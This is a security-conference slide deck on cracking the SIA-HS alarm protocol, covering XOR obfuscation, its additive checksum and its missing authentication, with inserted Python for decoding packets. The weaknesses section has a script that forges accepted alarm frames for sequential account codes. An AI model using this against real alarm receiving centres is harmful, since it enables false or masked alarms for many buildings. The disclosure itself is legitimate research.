Cracking the SIA-HS IP alarm protocol
“... IP protocol fitted with text in a data format with dynamic data encryption
which makes it impossible to decipher the message.”
--- Alphatronics Product Catalog

Wilco Baan Hofman
SIA-HS
● Alarm dialer basics
● Protocols
● Wireshark traces
● My implementation for bitlair
● Weaknesses
  ● SIA-HS
  ● Other protocols
● Summary
Alarm dialer basics
● ATE: Alarm Transmit Equipment
● ARC: Alarm Receiving Centre
● PROM: unique account code for a building
● ATE sends alarms, ARC sends ACKs
● SIA codes
  ● BA: Burglary Alarm, BR: Burglary Restore, etc.
Protocols
● Legacy/analog:
  ● ANSI SIA
  ● ANSI X/SIA
  ● Ademco ContactID
● IP:
  ● SIA-HS (Alphatronics proprietary)
  ● Vebon SecIP (proposed Dutch standard)
  ● ANSI/SIA IP DC-09 (USA standard)
  ● VdS 2465-S2 (German standard)
Wireshark
XOR 0xB6?
#!/usr/bin/env python3
# One SIA-HS UDP payload from the Wireshark capture, as hex
packet = bytearray.fromhex(
    "000000340101c5fff7f5eefa96879881b6b6b6b6b6a4e3b79ab7"
    "b6b6b6b6b6b6b6b6e4f3f1ffe5e2e4f7e2fff9f896e4f3e7e3f3e5e226fd")
# XOR every byte with the candidate key 0xB6: the byte that repeats
# most often in the dump, so probably NUL padding XORed with the key
for i in range(len(packet)):
    packet[i] ^= 0xB6
print(bytes(packet))
print(packet.hex())
Did it work? Yes, the device name drops out:
sIACXL 1.7
But wait..
XOR 0x85?
● Yes indeed, a different dialer decodes with 0x85:
DŽRC IPv2.4UREGISTRATION RENEWAL AT PORT 04008o 858585c7
Recap
● So we have:
  ● Packet length, not XORed
  ● Device name
  ● Decimal PROM number encoded as if it were hex
  ● Message
  ● Checksum? Oh boy
The checksum
● My nightmares contained checksums..
● I tried every known CRC-10 to CRC-16 algorithm
  ● Different seed values
● But wait..
  ● Longer packets generally give higher checksums
    – ... must be multiplication or addition
● OMFG? Really!? 16-bit sum of all preceding bytes
● D'OH!
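Putting the findings of the last slides together, here is an added example (not the slide script and not the bitlair siahsd code): it verifies the plain length field and the 16-bit additive checksum of the captured registration packet, recovers the XOR key from byte frequency instead of guessing, and splits the decoded body into device name, PROM and message. The field boundaries (a 15-byte NUL-padded name, two PROM bytes holding decimal digits as hex nibbles, three unidentified bytes 01 2c 01, eight NUL bytes, ASCII message) are inferred from this single capture and are assumptions, as is treating the two bytes 01 01 after the length as non-XORed header bytes.

```python
#!/usr/bin/env python3
"""Decode and verify one SIA-HS registration packet.

Added example, not the original slide script and not the bitlair siahsd code.
The field boundaries are inferred from the single packet on the slides and
are assumptions, not documented protocol facts.
"""
from collections import Counter
from typing import Optional

# Constructed test input: the hex dump of the captured UDP payload from the
# slides (one packet from ATE to ARC), copied as-is.
CAPTURED = bytes.fromhex(
    "000000340101c5fff7f5eefa96879881b6b6b6b6b6a4e3b79ab7"
    "b6b6b6b6b6b6b6b6e4f3f1ffe5e2e4f7e2fff9f896e4f3e7e3f3e5e226fd"
)


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the catalogue's "dynamic data encryption"."""
    return bytes(b ^ key for b in data)


def guess_xor_key(body: bytes) -> int:
    """Most frequent byte of the obfuscated body.

    The plaintext fields are NUL-padded, so key XOR 0x00 (the key itself)
    shows up more often than any other value: 0xB6 in this capture, 0x85 on
    the other dialer shown on the slides.
    """
    return Counter(body).most_common(1)[0][0]


def checksum(frame: bytes) -> int:
    """16-bit sum of every byte before the checksum field (big-endian on the wire)."""
    return sum(frame) & 0xFFFF


def verify_frame(pkt: bytes) -> bool:
    """Length and checksum check: the only integrity checks SIA-HS offers."""
    if len(pkt) < 8:
        return False
    length = int.from_bytes(pkt[:4], "big")   # plain, not XORed
    if length != len(pkt) - 4:                 # covers everything after itself, checksum included
        return False
    return checksum(pkt[:-2]) == int.from_bytes(pkt[-2:], "big")


def decode_packet(pkt: bytes, key: Optional[int] = None) -> dict:
    """Split the packet into its fields; raises ValueError on a damaged frame."""
    if not verify_frame(pkt):
        raise ValueError("bad length or checksum")
    header = pkt[4:6]        # 01 01 in the capture; meaning not established, assumed not XORed
    body = pkt[6:-2]
    if key is None:
        key = guess_xor_key(body)
    plain = xor_bytes(body, key)
    # Assumed layout: NUL-padded device name, then PROM bytes plus three
    # unidentified bytes, NUL padding, and the ASCII message.
    name, _, rest = plain.partition(b"\x00")
    middle, _, tail = rest.lstrip(b"\x00").partition(b"\x00")
    message = tail.lstrip(b"\x00")
    return {
        "key": key,
        "header": header.hex(),
        "device": name.decode("ascii"),
        # Decimal PROM number stored as if it were hex: bytes 12 55 read as "1255".
        "prom": middle[:2].hex(),
        "unidentified": middle[2:].hex(),   # 01 2c 01 in this capture
        "message": message.decode("ascii"),
        "checksum": int.from_bytes(pkt[-2:], "big"),
    }


if __name__ == "__main__":
    for field, value in decode_packet(CAPTURED).items():
        print(f"{field:>13}: {value!r}")
```

Because the checksum is a plain sum, swapping any two bytes of the body leaves it valid: it catches line noise, not tampering, and it is computed from bytes anyone can see, so it offers no authentication at all.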
My implementation
● Full SIA-HS ARC implementation
● Pluggable handlers:
  ● Database event logging
  ● JSONBOT IRC event notification
● Prepared for more protocols
  ● Started with Vebon SecIP
Weaknesses
● Protocol security requires at least these 3 things:
  ● Protection from packet injection
  ● Strong cipher
  ● Identity verification
SIA-HS
● No identity verification
● No real sessions!
  ● Predictable interaction between ARC and ATE
  ● UDP source address is easy to spoof
● Predictable PROM codes
  ● Sequential; true for all protocols
● I can trigger alarms for ALL of the ARC's customers without revealing my own IP
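To make the injection weakness concrete, an added example (not code from the slides or from siahsd) that builds frames a SIA-HS receiver would accept for any account. The frame layout (plain 4-byte length, the bytes 01 01, a 15-byte NUL-padded name, PROM digits packed as hex nibbles, three bytes 01 2c 01 of unknown meaning, eight NUL bytes, ASCII message, XOR key 0xB6, 16-bit sum checksum) is copied from the single packet on the slides and is an assumption; the builder is checked by reproducing that packet byte for byte. The alarm message text is a placeholder, since the slides do not show how SIA-HS carries the SIA event codes, and the example stops at constructing the bytes: sending them from a spoofed UDP source is not shown.

```python
#!/usr/bin/env python3
"""Forge SIA-HS frames that a receiver would accept for any PROM code.

Added example, not code from the slides or from bitlair/siahsd. The frame
layout is inferred from the single captured packet and is an assumption; the
alarm message text is a placeholder.
"""
from typing import List

# Constructed: the captured packet from the slides, used only to confirm that
# the builder reproduces it byte for byte.
CAPTURED = bytes.fromhex(
    "000000340101c5fff7f5eefa96879881b6b6b6b6b6a4e3b79ab7"
    "b6b6b6b6b6b6b6b6e4f3f1ffe5e2e4f7e2fff9f896e4f3e7e3f3e5e226fd"
)


def build_packet(device: str, prom: str, message: str, key: int = 0xB6) -> bytes:
    """Assemble one frame: plain length, 01 01, XORed body, 16-bit sum checksum."""
    if len(device) > 15:
        raise ValueError("device name longer than the assumed 15-byte field")
    if not (prom.isdigit() and len(prom) % 2 == 0):
        raise ValueError("PROM must be an even number of decimal digits")
    body = (
        device.encode("ascii").ljust(15, b"\x00")  # assumed 15-byte NUL-padded name field
        + bytes.fromhex(prom)                      # decimal digits stored as hex nibbles: "1255" -> 12 55
        + b"\x01\x2c\x01"                          # unidentified bytes, copied from the capture
        + b"\x00" * 8
        + message.encode("ascii")
    )
    payload = b"\x01\x01" + bytes(b ^ key for b in body)
    # The length covers everything after itself, the two checksum bytes included.
    frame = (len(payload) + 2).to_bytes(4, "big") + payload
    return frame + (sum(frame) & 0xFFFF).to_bytes(2, "big")


def arc_accepts(pkt: bytes) -> bool:
    """All a SIA-HS receiver can check: the framing length and the additive checksum.

    There is no MAC, no nonce and no session state, so nothing here depends on
    a secret or on who sent the packet.
    """
    if len(pkt) < 8 or int.from_bytes(pkt[:4], "big") != len(pkt) - 4:
        return False
    return (sum(pkt[:-2]) & 0xFFFF) == int.from_bytes(pkt[-2:], "big")


def forge_for_sequential_proms(first_prom: int, count: int, message: str) -> List[bytes]:
    """PROM codes are handed out sequentially, so neighbouring accounts are easy to guess."""
    width = max(4, len(str(first_prom)))
    width += width % 2                     # keep an even digit count for the nibble packing
    return [
        build_packet("sIACXL 1.7", f"{first_prom + i:0{width}d}", message)
        for i in range(count)
    ]


if __name__ == "__main__":
    assert build_packet("sIACXL 1.7", "1255", "REGISTRATION REQUEST") == CAPTURED
    for pkt in forge_for_sequential_proms(1255, 3, "ALARM (placeholder)"):
        print(pkt.hex(), "accepted" if arc_accepts(pkt) else "rejected")
```

Every byte that goes into the checksum is public, so the receiver cannot tell a forged frame from a genuine one; that is the missing identity verification from the Weaknesses slide, and no amount of XOR "encryption" substitutes for it.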
Other protocols
● Vebon SecIP
  ● Uses RSA+AES
  ● But the public key is transferred every session
  ● No identity verification (MitM!)
Summary
● Code on github: http://github.com/bitlair/siahsd
● Ask me for more specs on other protocols!
● Give me more dialers with different protocols!
Thank you
● Please check out other projects I'm working on
  ● Spacefed → will be presented later today :-)
  ● Bitlair → Hackerspace Amersfoort
  ● OHM2013 → the next big Dutch hacker camp